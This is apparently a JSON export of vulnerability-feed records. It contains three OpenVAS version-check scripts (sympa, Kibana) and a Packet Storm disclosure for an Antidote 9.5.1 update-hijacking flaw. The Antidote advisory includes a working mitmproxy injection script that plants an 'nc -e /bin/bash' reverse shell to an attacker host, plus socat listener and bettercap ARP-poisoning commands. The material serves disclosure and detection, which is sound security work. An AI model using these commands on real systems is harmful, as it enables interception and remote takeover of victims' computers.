"AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-09-21T16:05:29", "references": ["https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html"], "pluginID": "1361412562310891512", "description": "n Open Redirect vulnerability has been discovered in sympa. The\n", "edition": 1, "reporter": "Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net", "published": "2018-09-21T00:00:00", "title": "Debian LTS Advisory ([SECURITY] [DLA 1512-1] sympa security update)", "type": "openvas", "enchantments": {}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1000671"], "modified": "2018-09-21T00:00:00", "id": "OPENVAS:1361412562310891512", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891512", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1512.nasl 11515 2018-09-21 08:49:04Z cfischer $\n#\n# Auto-generated from advisory DLA 1512-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891512\");\n script_version(\"$Revision: 11515 $\");\n script_cve_id(\"CVE-2018-1000671\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1512-1] sympa security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-21 10:49:04 +0200 (Fri, 21 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-21 00:00:00 +0200 (Fri, 21 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\\.[0-9]+\");\n script_tag(name:\"affected\", value:\"sympa on Debian Linux\");\n script_tag(name:\"insight\", value:\"Sympa is a scalable and highly customizable modern mailing list manager\ncapable of handling big setups: 20.000 lists with 700,000 subscribers.\");\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n6.1.23~dfsg-2+deb8u3.\n\nWe recommend that you upgrade your sympa packages.\");\n script_tag(name:\"summary\", value:\"n Open Redirect vulnerability has been discovered in sympa. The\n'referer' parameter of the wwsympa.fcgi login action can result in\nOpen redirection and potential Cross Site Scripting via data URIs.\nThis attack appear to be exploitable via Victim browser opening a\ncrafted URL supplied by the attacker.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"sympa\", ver:\"6.1.23~dfsg-2+deb8u3\", rls_regex:\"DEB8\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-21T16:03:39", "references": ["https://discuss.elastic.co/t/elastic-stack-6-4-1-and-5-6-12-security-update/149035"], "pluginID": "1361412562310113275", "description": "Kibana is prone to an Information Disclosure Vulnerability.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-09-21T00:00:00", "title": "Elasticsearch Kibana 'CVE-2018-3831' Information Disclosure Vulnerability (Linux)", "type": "openvas", "enchantments": {}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3831"], "modified": "2018-09-21T00:00:00", "id": "OPENVAS:1361412562310113275", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113275", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_elasticsearch_kibana_CVE-2018-3831_lin.nasl 11518 2018-09-21 11:44:57Z jschulte $\n#\n# Elasticsearch Kibana 'CVE-2018-3831' Information Disclosure Vulnerability (Linux)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113275\");\n script_version(\"$Revision: 11518 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-21 13:44:57 +0200 (Fri, 21 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-21 13:35:23 +0200 (Fri, 21 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-3831\");\n\n script_name(\"Elasticsearch Kibana 'CVE-2018-3831' Information Disclosure Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_elasticsearch_kibana_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"Elasticsearch/Kibana/Installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Kibana is prone to an Information Disclosure Vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The _cluster/settings API, when queried, could leak sensitive configuration information\n such as passwords, tokens or usernames.\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an authenticated attacker to acquire valid login credentials.\");\n script_tag(name:\"affected\", value:\"Kibana versions s through 5.6.11 and 6.0.0 through 6.4.0.\");\n script_tag(name:\"solution\", value:\"Update to version 5.6.12 or 6.4.1 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://discuss.elastic.co/t/elastic-stack-6-4-1-and-5-6-12-security-update/149035\");\n\n exit( 0 );\n}\n\nCPE = \"cpe:/a:elasticsearch:kibana\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_is_less( version: version, test_version: \"5.6.12\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.6.12\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"6.0.0\", test_version2: \"6.4.0\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"6.4.1\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-21T16:03:38", "references": ["https://discuss.elastic.co/t/elastic-stack-6-4-1-and-5-6-12-security-update/149035"], "pluginID": "1361412562310113273", "description": "Kibana is tprone to a Cross-Site Scripting (XSS) Vulnerability.", "edition": 1, "reporter": "Copyright (C) 2018 Greenbone Networks GmbH", "published": "2018-09-21T00:00:00", "title": "Elasticsearch Kibana 'CVE-2018-3830' Cross-Site Scripting (XSS) Vulnerability (Linux)", "type": "openvas", "enchantments": {}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3830"], "modified": "2018-09-21T00:00:00", "id": "OPENVAS:1361412562310113273", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_elasticsearch_kibana_CVE-2018-3830_lin.nasl 11518 2018-09-21 11:44:57Z jschulte $\n#\n# Elasticsearch Kibana 'CVE-2018-3830' Cross-Site Scripting (XSS) Vulnerability (Linux)\n#\n# Authors:\n# Jan Philipp Schulte <jan.schulte@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, https://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif( description )\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113273\");\n script_version(\"$Revision: 11518 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-21 13:44:57 +0200 (Fri, 21 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-09-21 13:23:49 +0200 (Fri, 21 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2018-3830\");\n\n script_name(\"Elasticsearch Kibana 'CVE-2018-3830' Cross-Site Scripting (XSS) Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_elasticsearch_kibana_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"Elasticsearch/Kibana/Installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Kibana is tprone to a Cross-Site Scripting (XSS) Vulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The vulnerability exists within the source field formatter.\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to obtain sensitive information\n or perform destructive actions on behalf of other Kibana users.\");\n script_tag(name:\"affected\", value:\"Kibana versions 5.3.0 through 5.6.11 and 6.0.0 through 6.4.0.\");\n script_tag(name:\"solution\", value:\"Update to version 5.6.12 or 6.4.1 respectively.\");\n\n script_xref(name:\"URL\", value:\"https://discuss.elastic.co/t/elastic-stack-6-4-1-and-5-6-12-security-update/149035\");\n\n exit( 0 );\n}\n\nCPE = \"cpe:/a:elasticsearch:kibana\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! version = get_app_version( cpe: CPE, port: port ) ) exit( 0 );\n\nif( version_in_range( version: version, test_version: \"5.3.0\", test_version2: \"5.6.11\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"5.6.12\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nif( version_in_range( version: version, test_version: \"6.0.0\", test_version2: \"6.4.0\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"6.4.1\" );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-09-22T02:05:18", "references": [], "description": "", "edition": 1, "reporter": "Mickael Karatekin", "published": "2018-09-21T00:00:00", "title": "Antidote 9.5.1 Code Execution", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-13140"], "modified": "2018-09-21T00:00:00", "id": "PACKETSTORM:149468", "href": "https://packetstormsecurity.com/files/149468/Antidote-9.5.1-Code-Execution.html", "sourceData": "`# [CVE-2018-13140] Antidote Remote Code Execution against the update \ncomponent \n \n## Description \n \nAntidote is a spell checker software for Windows, Linux macOS operating \nsystem. \n \n**Threat** \n \nThe application is affected by a remote code execution against the \nupdate component. It leads to code execution with high privileges \nagainst the targeted system. \n \n**Expectation** \n \nNetwork operations like an update component should be held through \nencrypted communication channels like TLS, to prevent all sorts of \nhijacking attacks. \n \n## CVSS Score: \n \n**CVE ID**: CVE-2018-13140 \n \n**Access Vector**: remote \n \n**Security Risk**: high \n \n**Vulnerability**: CWE-311 \n \n**CVSS Base Score**: 8.2 \n \n**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:L \n \n# Details \n \nAntidote downloads its installation packages over HTTP protocol, without \nany kind of encryption such as TLS. \n \nAn attacker can thus perform a Man-In-The-Middle attack to intercept the \nupdate request / response in order to replace or patch the downloaded \npackage. \n \nMoreover, after the download is done, the component asks for \nadministrator rights to install the update, allowing thus an attacker to \nrun the payload as an administrator with privileged rights. \n \n \n## Proof of Concept \n \nWe developed a simple `mitm-proxy` module to exploit this vulnerability, \nhere the python source code: \n \n``` \n#(this script works best with --anticache) \n \nfrom mitmproxy import http \n \nMATCH = \"export \" \nCMD_TO_INJECT = \"nc -e /bin/bash IP_OF_ATTACKER 4444&\" \n \nclass Injector: \ndef response(self, flow: http.HTTPFlow) -> None: \nif MATCH.encode() in flow.response.content: \nprint(\"Match detected\") \ncmd = \"\\n%s\\n%s\" % (CMD_TO_INJECT, MATCH) \nflow.response.content = \nflow.response.content.replace(MATCH.encode(),cmd.encode()) \n \naddons = [Injector()] \n``` \n \nThe previous script is looking for the `export ` string for each HTTP \nresponses, in order to replace it with a simple command to give the \nattacker a remote reverse shell. Thereafter, when the update script is \ncalled by the update software component, the simple command is firstly \nrun as a simple user. The update script asks then user for the \nadministrator password, allowing our command to be executed as \nadministrator. \n \nIn fact, we could thus obtain two remote shells (as simple user and \nadministrator), using a multithreaded listening TCP handler: \n \n* The first one when the script is started (user privileges) ; \n \n* The second one after the victim types his credentials (administrator \nprivileges). \n \nThe following commands are used to exploit the vulnerability, using a \nMan-In-The-Middle attack: \n \n* a multithreaded `socat` TCP listener, to receive the victim reverse \nconnection with low privileges against the target: \n \n``` \nsocat - TCP-LISTEN:4444,fork \n``` \n \n* the mitm-proxy with our dedicated module: \n \n``` \nmitmproxy -s antidote.py --anticache --listen-port 9090 -m transparent \n``` \n \n* ARP Cache Poisoning using bettercap and redirecting traffic to mitm-proxy: \n \n``` \nbettercap -I YOUR_NETWORK_INTERFACE -T VICTIM_IP_ADDRESS --custom-proxy \nYOUR_IP_ADDRESS --custom-proxy-port 9090 -S ARP \n``` \n \nWhen the Antidote software asks for an update, `mitmproxy` will \nautomatically patch the update component using our reverse shell payload \nincluded. \n \nAfter the end of the download, the user will press `install`, leading to \nthe execution of the two payloads, as described. \n \n## Timeline (dd/mm/yyyy) \n \nCongratulations to Druide for handling this security response very \nquickly and professionally: \n \n* 30/04/2018 : Initial discovery. \n* 30/04/2018 : Contact acknowledgment. \n* 11/05/2018 : Detailed report communicated to Druide. \n* 12/05/2018 : Technical response, confirming the vulnerability and \nstating which versions are affected (Windows, Linux, but not Mac OS). \n* 08/06/2018 : Follow up e-mail from Druide informing about the patching \ndevelopment status and roadmap. \n* 23/06/2018 : Druide informs us of the fixed versions and suggest a \ndisclosure date on 31/07/2018 to let enough time for customers to patch. \n* 21/09/2018 : Disclosure. \n \n## Fixes \n \n* Antidote 9.5.2 (Windows/Linux) \n* Antidote 8.5.2 (Windows) \n* Antidote HD 6.1.2 (Windows) \n \n## Affected versions \n \n* All Antidote Windows/Linux versions <= 9.5.1 \n* Mac OS versions are unaffected (already using TLS encryption for updates) \n \n## Credits \n \n* Mickael KARATEKIN <m.karatekin -at- sysdream.com> \n \n-- \nSYSDREAM Labs <labs@sysdream.com> \n \nGPG : \n47D1 E124 C43E F992 2A2E \n1551 8EB4 8CD9 D5B2 59A1 \n \n* Website: https://sysdream.com/ \n* Twitter: @sysdream \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149468/antidote-exec.txt"}]}
